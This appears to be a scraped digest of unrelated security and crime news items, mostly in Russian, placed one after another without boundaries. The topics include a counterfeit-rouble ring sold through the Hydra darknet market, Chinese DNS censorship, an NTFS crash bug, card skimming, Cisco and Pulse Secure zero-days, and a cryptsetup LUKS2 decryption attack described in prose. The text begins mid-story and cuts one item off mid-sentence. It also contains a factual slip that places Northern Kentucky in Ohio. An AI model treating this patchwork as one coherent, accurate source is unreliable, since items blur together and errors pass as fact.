Фальшивки были доставлены во Владивосток курьерской доставкой. В феврале 2021 года Шведчиков и Костерин совершили вояж по рынкам и супермаркетам с целью сбыта подделок. На «дело» пошли в курсантской форме и медицинских масках. Покупали всякую ерунду — керамические кружки, мужские трусы, домашние тапочки, дешевые кеды, коврик для пола, трикотажную шапку. Вскоре после этого их задержали сотрудники полиции. Обманутые китайцы рассказали одно и то же: пришли двое парней, расплатились за продукцию пятитысячной купюрой, затем ушли. Подделки полиция тоже изъяла. Шведчиков и Костерин стали фигурантами уголовного дела, а осенью 2023 года их осудили к условным срокам Первореченским районным судом Владивостока. Приговор фигуранты не обжаловали.
«Гидру» запретили в Чапаевске
До апреля 2022 года «Гидра», где находился магазин самарских фальшивомонетчиков, была известнейшей российской наркоплатформой и крупнейшим в мире ресурсом по объему нелегальных операций с криптовалютой. «Гидру» запустили в 2015 году, уже на середину 2019-го на ресурсе было зарегистрировано 2,5 млн аккаунтов. Только в 2020 году выручка «Гидры» составила $1,3 млрд. Наркоплатформу связывали с именем российского предпринимателя Дмитрия Павлова.
Кроме наркотиков самыми популярными товарами на «Гидре» были фальшивые деньги
и документы, программы-вымогатели, хакерские услуги и программное обеспечение,
украденная личная информация и ворованная виртуальная валюта. На «Гидре»
выставлялись и предложения по трудоустройству, как правило, в сфере
производства и сбыта наркотиков. Магазины наркотиков платили за регистрацию на
«Гидре», затем вносили ежемесячную абонентскую плату и доплаты за право
находиться повыше в выдаче на поисковый запрос. Все транзакции производились в
криптовалюте. В течение суток после покупки клиент мог оставить отзыв о
«товаре» и продавце. У наркоплатформы даже была своя PR-служба, выступавшая с
публичными меморандумами в чате. Так, в конце 2019 года было объявлено о
выходе на ICO, где 49% «Гидры» собирались реализовать как 1,47 млн токенов
стартовой ценой $100 долларов.
С учетом интереса правоохранителей к нелегальному ресурсу, «Гидра» постоянно
меняла адреса и работала через систему сайтов-«зеркал» (аналогия с мифическим
чудовищем здесь вполне понятна — отрубают одну голову, вырастает другая).
Ресурс опознавали по заставке с трехголовым драконом. Зайти на сайт можно было
в анонимном браузере «Тор» и лишь после преодоления многоуровневой системы
защитных кодов (так называемой капчи).
Одно из «зеркал» «Гидры» осенью 2021 года удалось прикрыть прокурорам из Чапаевска. Как сообщала тогда прокуратура Самарской области, «прокуратурой города Чапаевска проверено соблюдение требований законодательства в сфере незаконного оборота наркотических средств и психотропных веществ. В ходе мониторинга сети Интернет в свободном доступе выявлен сайт, на котором размещена информация о незаконном обороте наркотических средств и психотропных веществ, запрещенных на территории Российской Федерации, — «Гидра». Размещенная информация склоняет к совершению противоправных действий, свидетельствует о распространении и пропаганде наркотиков, что может привести к угрозе жизни и здоровью неопределенного круга лиц». Прокуратура направила в суд иск о признании размещенной на сайте информации запрещенной, выиграла дело и направила материалы в Роскомнадзор для включения сетевого адреса в единую информационную систему доменных имен, содержащих запрещенную к распространению на территории Российской Федерации информацию. Впрочем, уже тогда «Гидре» оставалось работать недолго. В апреле 2022 года теневой маркетплейс был закрыт немецкой полицией, конфисковавшей криптовалюту на сумму, примерно равную 23 млн евро. Ранее санкции в отношении «Гидры» ввело управление по контролю за иностранными активами минфина США. На момент закрытия на «Гидре» было зарегистрировано 19 тыс. магазинов.
После ликвидации наркоплатформы в российском даркнете началась ожесточенная конкурентная борьба за освободившуюся нишу, которая идет до сих пор.
НАТАЛЬЯ ЦОЙ, помощник прокурора Самарской области по взаимодействию со СМИ
Волжский районный суд Самарской области вынес приговор по уголовному делу в отношении четырех граждан. В зависимости от роли и степени участия они признаны виновными по статье 210 УК РФ (создание и участие в преступном сообществе), части 3 статьи 186 УК РФ (изготовление, хранение, перевозка или сбыт поддельных денег или ценных бумаг, совершенные организованной группой).
Суд установил, что в сентябре 2020 года в Самаре местный житель создал преступное сообщество, состоящее из четырех функционально обособленных групп, действовавших на территории Санкт-Петербурга, Ленинградской, Калининградской, Нижегородской, Челябинской, Тюменской, Иркутской, Самарской областей, Приморского и Пермского краев, республик Крым и Татарстан, и наладил сбыт фальшивых банкнот достоинством 5 тысяч рублей.
Поддельные банковские билеты приобретались большими партиями и сбывались через интернет-магазин на запрещенном в Российской Федерации сайте. Стоимость поддельной купюры составляла около 50% от номинала, оплату принимали в криптовалюте, а доставляли товар через тайники или в конвертах курьерской службой.
Партии фальшивых денег перевозились на арендованных автомобилях и хранились в тайниках, организованных в лесополосе в Ленинградской области, арендованной квартире в Санкт-Петербурге и в частных домах на территории Самарской области. Членами преступного сообщества совершено 78 эпизодов сбыта фальшивых банковских билетов.
Суд согласился с мнением государственного обвинителя и назначил организатору преступного сообщества наказание в виде 20 лет лишения свободы со штрафом в размере 2 млн рублей. Трое других осужденных приговорены к лишению свободы на срок от 14 до 16 лет со штрафами от 900 тысяч до 2 млн рублей. Отбывать наказание они будут в исправительной колонии строгого режима.
Группа ученых из Университета Стоуни-Брук, Массачусетского университета, Калифорнийского университета в Беркли, а также Университета Торонто в Канаде попыталась определить масштабы китайской интернет-цензуры изучить работу «великого китайского файрвола».
Исследование длилось более девяти месяцев, и специально для него эксперты создали систему под названием GFWatch, которая обращалась к доменам внутри и за пределами китайского интернет-пространства, а затем проверяла, как "великий китайский файрвол" реагирует на это и вмешивается в соединения на уровне DNS (для предотвращения доступа к домену со стороны китайских пользователей или ограничения доступа к внутренним сайтам страны).
[](https://xakep.ru/wp- content/uploads/2021/07/353726/GFW-poisoning.png)
С помощью GFWatch исследователи проверили 534 млн различных доменов, ежедневно обращаясь к примерно 411 млн доменов, чтобы фиксировать, а затем перепроверять, постоянны ли обнаруженные ими блокировки. В итоге было подсчитано, что в настоящее время «великий китайский файрвол» блокирует около 311 000 доменов, причем 270 000 блокировок работают как нужно, а еще 41 000 доменов, похоже, оказались заблокированы случайно.
Ошибки возникли в силу того, что китайские власти пытались блокировать домены, используя регулярные выражения для фильтрации DNS, но они не учитывали ситуации, когда короткий домен является частью более длинного доменного имени, и блокировки затронули другие сайты. Например, власти страны запретили доступ к reddit.com, при этом случайно заблокировав booksreddit.com, geareddit.com и 1087 других сайтов.
[](https://xakep.ru/wp- content/uploads/2021/07/353726/GFW-overblocked-strings.png)
Исследовательская группа составила список 311 000 заблокированных доменов, чтобы определить, какой тип контента китайские власти запрещают чаще всего. Используя сервисы, подобные FortiGuard, исследователи выяснили, что около 40% заблокированных сайтов — это недавно зарегистрированные домены, которые китайские власти блокируют превентивно, пока те не категоризировали и не внесли свой контент в белый список.
Что касается прочих «запрещенных» доменов, чаще всего на них размещается бизнес-контент, порнография, или информация, связанная с ИТ. Также под блокировки попадают сайты, на которых размещены инструменты, позволяющие обойти блокировки, игорные ресурсы, личные блоги, развлекательные порталы, новостные и медиасайты, а также домены с вредоносным и мошенническим контентом.
[](https://xakep.ru/wp- content/uploads/2021/07/353726/GFW-blocked-list.png)
Также интересно, что после начала пандемии коронавируса, к блокировкам добавилось много доменов, связанных с COVID-19. В числе «закрытых» доменов были: covid19classaction.it, covid19song.info, covidcon.org, ccpcoronavirus.com, covidhaber.net и covid-19truth.info. Некоторые из этих сайтов содержат материалы, обвиняющие в пандемии коронавируса Китай.
«Мы выяснили, что большинство доменов, заблокированных “великим китайским файрволом”, непопулярны и вообще не попадают в списки самых популярных сайтов», — рассказывают исследователи.
Click to expand...
К примеру, из выборки в 138 700 доменов только 1,3% сайтов (около 1800) входят в число 100 000 самых популярных сайтов в интернете (по данным рейтинга Tranco).
Кроме того, исследователи заявили, что выявили случаи, когда китайские DNS- блокировки, которые обычно подразумевают изменение записей DNS, возвращаемых китайским пользователям, случайно «портили» записи DNS за пределами китайского интернет-пространства, в сетях некоторых DNS-провайдеров. Такие ошибки затронули не менее 77 000
Source: https://xakep.ru/2021/07/12/how-great-is-the-great-firewall/
Microsoft has fixed a bug that could allow a threat actor to create specially crafted downloads that crash Windows 10 simply by opening the folder where they are downloaded.
In January, we reported on a new Windows 10 vulnerability discovered by
Jonas Lykkegård that allows any user or
program, even those with low privileges, to mark an NTFS drive as corrupted
simply by accessing the special folder.
What is particularly concerning is how easy it is easy to trigger the bug. By
simply changing to the folder in a command prompt, accessing it from the Run:
field, opening it from File Explorer, Windows 10 would mark the drive as dirty
and prompt you to reboot your computer and run chkdsk, as shown below.

Accessing an NTFS path triggers a corruption warning
To make matters worse, threat actors and pranksters began distributing fake
tools, malicious shortcuts, or malware
[1,
2,
3,
4]
on Discord and social media that, when executed, would access the folder and
trigger the bug.
Threat actors could also use the bug to force a crash of a breached system to hide their activities.
While the error generated by the bug stated the drive was corrupted, Microsoft [clarified](http://www.osr.com/blog/2021/01/21/mitigating-the-i30bitmap-ntfs- bug/) that volume was only marked as dirty, and a reboot and chkdsk would quickly mark it as clean.
Unfortunately, in one of our and other people's tests, chkdsk did not fix the issue, and Windows 10 refused to boot again.
In February, Microsoft quietly started testing the fix within Windows Insider builds. This week, as part of the April 2021 Patch Tuesday, Microsoft has finally fixed the vulnerability in all supported versions of Windows 10.
Microsoft has classified this bug as a DDoS vulnerability and is tracking it as [CVE-2021-28312](https://msrc.microsoft.com/update-guide/en- US/vulnerability/CVE-2021-28312) with the title 'Windows NTFS Denial of Service Vulnerability.'
After installing this week's Patch Tuesday updates, BleepingComputer can confirm that the bug no longer works as it will now just display an error stating that "The directory name is invalid," as shown below.
Accessing the path no
longer marks a drive as corrupted
BleepingComputer strongly recommends that all Windows users install the latest
Patch Tuesday security updates. Not only for this vulnerability but the 107
other vulnerabilities fixed this month.
7 апреля в федеральной прокуратуре Восточного округа Калифорнии сообщили об аресте 33-летнего Армена Мхитаряна, которого обвиняют в мошенничестве с банками и кредитными картами, за что ему грозит до 30 лет лишения свободы и до миллиона долларов штрафа, но до решения суда он считается невиновным.
33-летний Мхитарян живет в Глендейле, пригороде Лос-Анжелеса с населением примерно 205 тыс. человек, больше трети которых армяне. На следующий день после ареста Армена Мхитаряна виртуально доставили к судье-магистрату Шиле Оберто, где ему по видеосвязи были разъяснены права, предоставлен казенный адвокат Рина Харрион-Хаммершидт, и он не признал себя виновным, после чего был освобожден без залога, обязавшись сдать паспорт и не обращаться за новым, а также не покидать штат Калифорния и прибыть в суд 14 апреля, когда судья Стэнли Бун определит меру пресечения его свободы.
В 33 пунктах обвинения, с аргументами которого присяжные большого жюри согласились 13 апреля прошлого года, на 29 страницах указано, что почти 5 лет назад Армен Мхитарян похитил весьма нехитрым способом больше 160 тыс. долларов. В предисловии обвинения разъясняется, что такое «средство доступа» к деньгам на счете в банке, то есть легальная кредитная или дебитная карта на имя ее владельца, предъявленная самим владельцем. «Не авторизованное средство доступа» – это карта потерянная, украденная, недействительная или полученная с целью обмана банка, а «поддельное средство доступа» – это карта фальшивая, измененная или переделанная на другое имя опять же с преступной целью. Помимо этого в обвинении разъясняется, что «считывающее устройство» (skimming device или skimmer) – это устройство, которое устанавливают на панели или внутри банковского автомата, и оно считывает с магнитной ленты карты данные ее владельца, давая возможность снять с его счета деньги.
Располагая такими «считывающими устройствами», пути приобретения или изготовления которых в обвинении не уточняются, Армен Мхитарян с 9 мая по 31 августа устанавливал их в автоматах по продаже почтовых марок и снимал данные владельцев карт Bank of America, Bank of West, Chase Bank. Citibank, Golden One Credit Union, MUFG Union Bank, Navy Federal Credit Union, Westamerica Bank, USAA Federal Savings Bank и других, получая всюду комплекты марок стоимостью 47 долларов. Вклады в эти банки защищены Федеральной корпорацией страхования депозитов, и делом Мхитаряна занималось ФБР. Как было установлено, за один день 9 мая 2016 года он «обслужил» автомат почтового отделения городка Кловис в калифорнийском графстве Фресно 29 раз, пользуясь данными карт на разные имена с разными номерами. Я помножил 29 на 47 и получил 1363 доллара, то есть, стало быть, марки еще на 237 долларов Армен получил где-то еще. Куда он их дел, тоже не сообщается, но почтовые марки в любой уважающей себя стране считаются устойчивым эквивалентом валюты и даже заменяют ее в лихую годину кризисов и инфляций.
За день до ареста армянина Мхитаряна на Западном побережье США в федеральном суде Восточного округа штата Пенсильвания на Восточном побережье приговорили к 65 месяцам лишения свободы латыша и гражданина этой прибалтийской республики Эдгара Ивуланса, который занимался тем же, что и Мхитарян. Помимо тюремного срока, судья Барклай Серрик обязал Ивуланса заплатить 12 754 доллара в возмещение ущерба, оштрафовал на такую же сумму и велел внести 4 тыс. долларов судебных издержек. В меморандуме перед приговором его государственный адвокат Анджела Халим указала, что к моменту предъявления обвинения Эдгара Ивуланса в США не было, и с 2017 по 2019 год он работал менеджером компании проката автомобилей в международном аэропорту Дублина в Ирландии. В начале 2019 он полетел домой в Латвию навестить жену и мать, и 2 февраля был арестован в Германии, когда пересаживался на другой самолет. Как выяснилось, в федеральном суде Восточного округа Пенсильвании Эдгара Ивуланса давно ждали, и ордер на его арест судья-магистрат Ричард Ллорет подписал 27 октября 2016 года.
Четыре месяца Ивуланс провел в немецкой тюрьме. 6 июня 2019 года его экстрадировали в Соединенные Штаты, и в тот же день министерство внутренней безопасности рекомендовало иммиграционным властям взять его под стражу, где он содержится уже 26 месяцев, а после освобождения будет депортирован. В базе данных федерального бюро тюрем его нет, но, как утверждает его адвокат, на период пандемии Ивуланса поместили в «федеральный изолятор» (Federal Detention Center), где содержат в «ужасающих, пугающих и изолированных условиях».
15 июня 2020 года Ивуланс признал себя виновным по всем пунктам предъявленного обвинения: мошенничество с помощью почты и электронный перевод денег; изготовление, использование и владение устройством для мошенничества; отмывание денег и похищение личных данных. «Подобные преступления с кражей личных данных оказывают разрушительное и длительной действие на их жертв, – прокомментировала приговор временный федеральный прокурор Восточного округа Пенсильвании Дженниферр Уильямс. – Преступления Ивуланса особенно оскорбительны, так как он совершал их после двух осуждений за другие мошенничества, которые привели к его депортации».
Не вдаваясь в подробности, пресс-релиз прокуратуры поясняет, что в прошлом Ивуланс жил в Соединенных Штатах, где был дважды судим в федеральном суде штата Иллинойс за мошенничество, а затем депортирован на родину в Латвию. Не оспаривая это, его адвокат Анджела Халим в меморандуме перед приговором указала, что 13 февраля 2005 года Эдгара Ивуланса арестовали за управление машиной под воздействием алкоголя и превышение скорости, что считается малозначительным преступлением (misdemeanor), и приговорили в одному году надзора. Так или иначе, утверждает обвинение, вернувшись на родину Эдгар не унялся, а продолжал заниматься «изощренным мошенничеством» по отношению к Соединенным Штатам.
Подробнее об этом должно сообщаться в предварительном обвинении (affidavit), но доступа к этому документу нет. Сообщается, что Ивуланс «пользовался крадеными личными данными граждан США и получал на их имена кредитные карты, которые отправлял сообщнику в Филадельфию. Кто этот сообщник, неизвестно, но в меморандуме адвоката Халим мелькает фамилия «Матесовикс», что вполне может быть Матусевичем на латышский лад. Филадельфийский сообщник Ивуланса приобретал на полученные от него кредитные карты различные товары, которые либо продавал, либо возвращал в магазины и получал их стоимость. Полученные деньги он переводил сообщникам в Россию или Ирландию, откуда к Эдгару Ивулансу попадала положенная ему доля.
«Находясь в Латвии, – утверждает федеральная прокуратура Восточного округа Пенсильвании, – Ивуланс, пользуясь данными граждан США, также изготовлял новые поддельные кредитные карты и отправлял сообщнику в Филадельфию считывающее магнитные ленты устройство, которое было использовано для создания новых поддельных кредитных карт, на которые приобретались предоплаченные дебитные карты и другие товары». Эти товары отправлялись сообщникам Ивуланса в Швецию, Украину и лично ему в Латвию. Когда латвийские власти, сотрудничая с ФБР, провели обыск в доме Ивуланса, в его компьютере нашли больше 12 тысяч номеров кредитных карт и минимум 10 полных личных данных жителей США». На это адвокат Анджела Халим перед приговором написала судье Барклаю Серрику, что, как утверждает ее клиент, он не был «организатором, лидером, менеджером или руководителем преступной активности, а работал в тандеме с сообщниками, не давая указаний другим». Каждый участник группы принимал самостоятельные решения ради общей цели, а когда эта цель приносила очередную прибыль, деньги делились между соучастниками, и тут решения принимал Матесовикс-Матусевич.
Все-таки Интернет великая сила, и в графике работы 84-летнего судьи Барклая Серрика, которого 21 год назад назначил президент Билл Клинтон, я наткнулся на дело «Соединенные Штаты против Артурса Матесовикса». Проживающий в ирландской столице Дублине Матесовикс значится сообщником Эдгара Ивуланса, но судят его отдельно. В конце августа 2019 года он признал себя виновным, и приговор был назначен на 13 апреля прошлого года, но пока не прозвучал. Последнее решение по его делу судья Серрик принял 25 февраля этого года, обязав Матесовикса заплатить 6400 долларов за услуги переводчика до и во время признания им вины. Раньше я с таким не сталкивался, но почтенному Барклаю Серрику виднее.
Компания Proton запустила бесплатный и опенсорсный веб-сервис Docs in Proton Drive, оснащенный end-to- end шифрованием и предназначенный для редактирования и совместной работы с документами.
Напомним, что Proton — это швейцарская компания, известная своими сервисами, ориентированными на конфиденциальность, включая Proton VPN, Proton Mail, Proton Pass, Proton Drive, а теперь еще и Proton Docs. Недавно компания объявила о переходе в статус некоммерческой организации, что должно лучше соответствовать ее миссии, где приоритет отдается конфиденциальности и общественному благу, а не получению прибыли.
Proton заявляет, что Docs представляет собой надежную, безопасную и удобную альтернативу таким известным онлайн-платформам для редактирования документов и совместной работы, как Google Docs.
В компании говорят, что решающую роль в ускорении разработки Docs сыграло [недавнее приобретение](https://proton.me/blog/proton-standard-notes-join- forces) приложения для работы с зашифрованными заметками Standard Notes.
Среди ключевых особенностей Proton Docs разработчики перечисляют:
сквозное шифрование в режиме реального времени для защиты от перехвата нажатий клавиш и движений курсора;
отсутствие сбора и передачи данных пользователя третьим сторонам;
безопасное и быстрое встраивание изображений в документы;
бесплатный тарифный план без ограничений по функциям для хранения до 5 ГБ документов;
открытый исходный код с независимым аудитом для обеспечения прозрачности и надежности;
поддержка редактирования rich text, позволяющая создавать документы профессионального уровня;
поддержка markdown, блоков кода и чек-листов;
бесшовная интеграция с различными форматами, включая проприетарные (такие как .docx);
функции для совместной работы в режиме реального времени, включая комментирование, индикаторы присутствия и уникальные курсоры.
Отмечается, что всем приглашенным для совместной работы пользователям потребуется учетная запись Proton, чтобы обеспечить всем участникам одинаковый уровень безопасности.
Американка из Северного Кентукки (штат Огайо) приговорена к 3,5 года тюрьмы за кражу 185 тысяч долларов с муниципальной кредитки и карточек своих коллег.После этого она еще три года будет отбывать условный срок.
Сейчас Эллисон Дональдсон (Allison Donaldson) 50 лет, однако свои преступления она начала совершать еще в 2005 году, когда ей было 32. Все эти годы она работала административным менеджером в Департаменте общественных работ, благодаря чему имела доступ к данным карточек, выпущенных муниципалитетом в корпоративных нуждах, а также к кредиткам своих коллег.
Что любопытно, в 2012 году она даже попалась на использовании городских карточек в личных целях, однако работодатель по неизвестной причине не стал наказывать ее за провинность, ограничившись краткосрочным отстранением от службы. После возвращения к работе женщина продолжила расходовать чужие деньги.
В итоге за все эти годы ей удалось украсть 185 тысяч долларов, которые были потрачены на ремонт дома и автомобиля Mercedes Benz, а также на дамскую сумочку Chanel. Прокуратура настаивала на 20-летнем тюремном сроке, но женщина разумно пошла на сделку со следствием и отделалась относительно мягким приговором. Кроме того, она выплатит штраф в размере 12 тысяч долларов.
source: themessenger.com/news/woman-swiped-city-issued-credit-card- spent-185000-to-buy-chanel-tote-remodel-her-master-bedroom-court-docs
США могут обменять задержанного в РФ по подозрению в шпионаже журналиста Wall
Street Journal Эвана Гершковича на кого-то из троих россиян, осужденных судом
в Штатах за киберпреступления, считают американские СМИ. Возможными
кандидатами на обмен называют Романа Селезнева, Владислава Клюшина и
Александра Винника. Источники в Вашингтоне считают, что в случае обмена
«русские хакеры» будут работать на Кремль.
В США сейчас нет российских граждан, находящихся в тюрьме по обвинению в
шпионаже, однако некоторых других заключенных гипотетически можно обменять на
журналиста WSJ Эвана Гершковича, арестованного в России. Об этом говорится в
материале американской газеты The Wall Street Journal (WSJ).
«Эти россияне <…> были осуждены за киберпреступления. Их возможный обмен зависит во многом от того, насколько эффективно их защитники смогут подать эту идею американской и российской аудиториям», — полагает автор заметки.
В статье также отмечается, что редакция WSJ отвергает подозрения в адрес Гершковича. «Теперь судьба мистера Гершковича, обвиняемых российских граждан или других заключенных может решиться в недавно возродившейся холодно- меркантильной вселенной межгосударственных обменов пленными. Главный вопрос — насколько трудно будет такую сделку согласовать», — отмечает автор материала.
«На этой неделе высокопоставленный чиновник Белого дома указал, что США открыты для креативных решений, позволяющих заключить сделку как для Уилана, так и для Гершковича», — говорится в публикации.
По словам этого чиновника, на которого ссылается автор статьи, американские власти ищут законные способы, чтобы договориться по этому вопросу.
Между тем, пишет WSJ, «нет никаких признаков того, что было бы легко заключить эту сделку» с участием двух или трех стран, учитывая пристальное внимание к задержанию Гершковича.
Среди потенциальных кандидатов на обмен на Гершковича WSJ называет имена Романа Селезнева, Владислава Клюшина и Александра Винника.
Селезнев – сын депутата Госдумы V, VI, VII и VIII созывов от ЛДПР Валерия Селезнева. В 2016 году суд в Сиэтле (штат Вашингтон) признал Романа Селезнева виновным во взломе сотен фирм и продаже краденых данных. Убытки от мошенничества превысили $169 млн. В 2036 году он должен выйти на свободу.
«Сейчас, насколько я знаю, он — единственный русский, которого они хотели бы вернуть», — сказал адвокат Селезнева Игорь Литвак.
Владислав Клюшин был экстрадирован в 2021 году из Швейцарии. Суд в Бостоне (штат Массачусетс) признал его виновным в получении $90 млн за сделки с ценными бумагами на основе сведений, украденных из закрытых компьютерных сетей в США. Приговор Клюшину должны вынести в мае.
Александр Винник был обвинен в незаконном управлении криптовалютной биржей. Задержали его в 2017 году в Греции. После его экстрадировали во Францию, а оттуда – в США. Его приговорили к 55 годам заключения.
30 марта корреспондента газеты The Wall Street Journal Эвана Гершковича задержали в Екатеринбурге по подозрению в шпионаже, сообщила ФСБ.
«Пресечена противоправная деятельность аккредитованного при МИД России корреспондента московского бюро американской газеты The Wall Street Journal гражданина США Гершковича Эвана, 1991 года рождения, подозреваемого в шпионаже в интересах американского правительства», — говорится в релизе ведомства.
В ФСБ заявили, что журналист по заданию США осуществлял сбор сведений «о деятельности одного из предприятий российского военно-промышленного комплекса». Гершковича задержали при попытке получения секретных сведений в Екатеринбурге, подчеркнули в спецслужбе и добавили, что следственным управлением ФСБ в отношении него возбуждено уголовное дело по статье о шпионаже.
Cisco раскрыла 0-day в инструменте управления серверами Prime Collaboration Deployment (PCD), которую можно использовать для атак с использованием межсайтовых сценариев.
Утилита предназначена для выполнения задач миграции или обновлений на серверах, находящихся в контуре организации.
CVE-2023-20060 была обнаружена в веб-интерфейсе управления Cisco PCD 14 (включая и более ранние версии) исследователем Пьером Вивеньсом из Центра кибербезопасности НАТО (NCSC).
Успешная эксплуатация позволяет злоумышленникам, не прошедшим проверку подлинности, запускать XSS-атаки удаленно, но требует взаимодействия с пользователем.
Рабочий эксплойт может позволить злоумышленнику выполнить произвольный код сценария в контексте уязвимого интерфейса или получить доступ к конфиденциальной информации в браузере.
Проблема вызвана неправильной проверкой веб-интерфейсом управления введенных пользователем данных.
Злоумышленник может воспользоваться этой уязвимостью, убедив пользователя интерфейса щелкнуть созданную ссылку.
На данный момент для XSS-уязвимости нет обходных путей, а обновления безопасности для ее устранения компания обещает выпустить в следующем месяце.
Но в случае с Cisco «обещать - не значит жениться», уже полгода поставщик с таким же успехом обещает исправить другую 0-day.
CVE-2022-20968 в IP-телефонах с прошивкой серий 7800 и 8800 версии 14.2 была раскрыта еще начале декабря 2022 года и успела обзавестись PoC, хотя должна была быть закрыта еще в январе.
Пока же клиентов Cisco (PSIRT) утешают лишь заявлениями об отсутствии доказательства злонамеренного использования новой 0-day в дикой природе.
[ https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco- sa-pcd-xss-jDXpjm7 ](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco- sa-pcd-xss-jDXpjm7)
FireEye утверждает, что сразу две хак-группы используют уязвимость нулевого дня в Pulse Secure VPN для атак на сети американских оборонных подрядчиков и правительственных организаций по всему миру.
Специалисты обнаружили атаки в начале текущего года, и разработчики Pulse Secure VPN уже подтвердили заявления исследователей. По данным FireEye, взломы начались еще в августе 2020 года, когда первая хак-группа, которую компания отслеживает как UNC2630, нацелилась на оборонных подрядчиков США и европейские организации.
Тогда хакеры использовали комбинацию старых багов в Pulse Secure VPN, а также новую 0-day уязвимость (CVE-2021-22893), чтобы захватывать контроль над устройствами Pulse Secure, а затем устанавливать на них малварь SLOWPULSE, RADIALPULSE, THINBLOOD, ATRIUM, PACEMAKER, SLIGHTPULSE или PULSECHECK. Эти вредоносы действовали как веб-шеллы и бэкдоры в сети взломанной организации.
В октябре 2020 года к атакам присоединилась вторая группа хакеров, которой FireEye присвоила идентификатор UNC2717. Эта группировка тоже применяла аналогичные методы и 0-day баг для установки на устройства собственного набора малвари (HARDPULSE, QUIETPULSE и PULSEJUMP). От атак вторых злоумышленников страдали сети государственных учреждений в Европе и США.
Хотя FireEye не могла связать две эти группировки и кампании, специалисты отмечают, что «возможно, одна или несколько связанных групп несут ответственность за разработку и распространение различных инструментов среди слабо связанных друг с другом APT».
По информации экспертов, атаки продолжались до марта 2021 года. За время расследования аналитикам удалось обнаружить еще два дополнительных образца малвари (таким образом, общее количество вредоносов достигло 12), которые так же использовались для взлома, но компания не смогла однозначно связать эти образцы с конкретной группой атакующих.
Хотя у FireEye нет почти никакой информации о второй хак-группе, судя по внутренним данным исследователей, первая группа UNC2630, похоже, «действует от имени правительства Китая и может иметь связи с APT5», то есть известной китайской кибершпионской группировкой.
Разработчики Pulse Secure VPN уже выпустили бюллетень безопасности, посвященный проблеме CVE-2021-22893. В документе можно найти рекомендации и временные меры по предотвращению атак, так как полноценный патч для этой проблемы будет доступен только в мае. Также компания представила инструмент Pulse Security Integrity Checker Tool, который предназначен для сканирования серверов Pulse Secure VPN в поисках признаков взлома, эксплуатации CVE-2021-22893 и других известных уязвимостей.
Источник: xakep.ru/2021/04/21/pulse-secure-vpn-0day/
В пакете Cryptsetup, применяемом для шифрования дисковых разделов в Linux, выявлена уязвимость ([CVE-2021-4122](https://security- tracker.debian.org/tracker/CVE-2021-4122)), позволяющая через модификацию метаданных добиться отключения шифрования в разделах в формате LUKS2 (Linux Unified Key Setup). Для эксплуатации уязвимости атакующий должен иметь физический доступ к зашифрованному носителю, т.е. метод имеет смысл в основном для атаки на зашифрованные внешние накопители, такие как Flash-диски, к которым злоумышленник имеет доступ, но не знает пароля для расшифровки данных.
Атака применима только для формата LUKS2 и связана с манипуляцией метаданными, отвечающими за активацию расширения "online reencryption", позволяющего при необходимости смены ключа доступа инициировать процесс перешифрования данных на лету без остановки работы с разделом. Так как процесс расшифровки и шифровки с новым ключом занимает много времени, "online reencryption" даёт возможность не прерывать работу с разделом и выполнять перешифрование в фоне, постепенно переводя данные с одного ключа на другой. В том числе имеется возможность выбора пустого целевого ключа, что позволяет перевести раздел в расшифрованный вид.
Атакующий может внести в метаданные LUKS2 изменения, симулирующие аварийное прерывание выполнения операции расшифровки в результате сбоя и добиться расшифровки части раздела после последующей активации и использования модифицированного накопителя владельцем. При этом пользователь, подключивший модифицированный накопитель и разблокировавший его корректным паролем, не получает какого-либо предупреждения о выполнении процесса восстановления прерванной операции перешифрования и может узнать о ходе данной операции только при помощи команды "luks Dump". Объём данных, расшифровки которых может добиться атакующий, зависит от размера заголовка LUKS2, но при размере по умолчанию (16 MiB) может превышать 3 ГБ.
Проблема вызвана тем, что несмотря на то, что операция перешифрования требует расчёта и проверки хэшей нового и старого ключей, для восстановления прерванного процесса расшифровки хэш не требуется, если новое состояние подразумевает отсутствие ключа для шифрования (plaintext). Кроме того, метаданные LUKS2, в которых задаётся алгоритм шифрования, не защищены от модификации в случае попадания в руки злоумышленника. Для блокирования уязвимости разработчики добавили в LUKS2 дополнительную защиту метаданных, для которых теперь проверяется дополнительный хэш, вычисляемый на основе известных ключей и содержимого метаданных, т.е. атакующий больше не сможет незаметно изменить метаданные, не зная пароля для расшифровки.
Типовой сценарий атаки требует, чтобы у злоумышленника была возможность несколько раз получить накопитель в свои руки. Вначале атакующий, который не знает пароля доступа, вносит в область метаданных изменения, инициирующие расшифровку части данных при следующей активации накопителя. Затем накопитель возвращается на место и атакующий ждёт, пока пользователь не подключит его, введя пароль. Во время активации устройства пользователем запускается фоновый процесс перешифрования, в ходе которого часть зашифрованных данных заменяется на расшифрованные данные. Далее, если атакующий сможет получить в свои руки устройство ещё раз, часть данных на накопителе будет находиться в расшифрованном виде.
Проблема выявлена мэйнтейнером проекта cryptsetup и устранена в обновлениях cryptsetup 2.4.3 и 2.3.7.
Уязвимость проявляется только начиная с выпуска cryptsetup 2.2.0, в котором появилась поддержка операции "online reencryption". В качестве обходного пути защиты может использоваться запуск с опцией "--disable-luks2-reencryption".
6 августа 1991 года был запущен первый в мире сайт. Это случилось почти через полтора года после появления технологии, благодаря которой появился интернет.
Создатель интернета, самого первого сайта и сетевых технологий, которые используются по сей день, — английский учёный Тим Бернерс-Ли. Он до сих пор довольно активен, одна из его недавних инициатив — попытка полной реформации интернета, которая подразумевает в том числе борьбу с монополистами и появление равных возможностей для всех.
Заглавная страница первого в мире сайта размещается по адресу info.cern.ch/hypertext/WWW/TheProject.html. Там первые пользователи сети могли узнать, как создать собственный сервер для размещения сайтов. На info.cern.ch также содержался каталог веб-ресурсов (когда их ещё было очень мало).
Первый сайт был написан на языке HTML, который создал Тим Бернерс-Ли, и размещался на компьютере в ЦЕРН (Европейская организация по ядерным исследованиям). Примечательно, что сервер рабтал на компьютере NeXT — эту компанию создал Стив Джобс в перерыве между тем как он возглавлял Apple.
Суд США приговорил Роджера Нильс-Йонаса Карлссона к 15 годам тюремного заключения, конфискации $16 млн и собственности в Таиланде в рамках дела о криптовалютном мошенничестве.
Гражданин Швеции Роджер Нильс-Йонас Карлссон (Roger Nils-Jonas Karlsson), который обманул более 3 500 жертв и выманил у них $16 млн в BTC и других активах с 2011 по 2019 год, был приговорен к 15 годам тюрьмы за мошенничество с ценными бумагами, мошенничество с использованием электронных средств и отмывание денег.
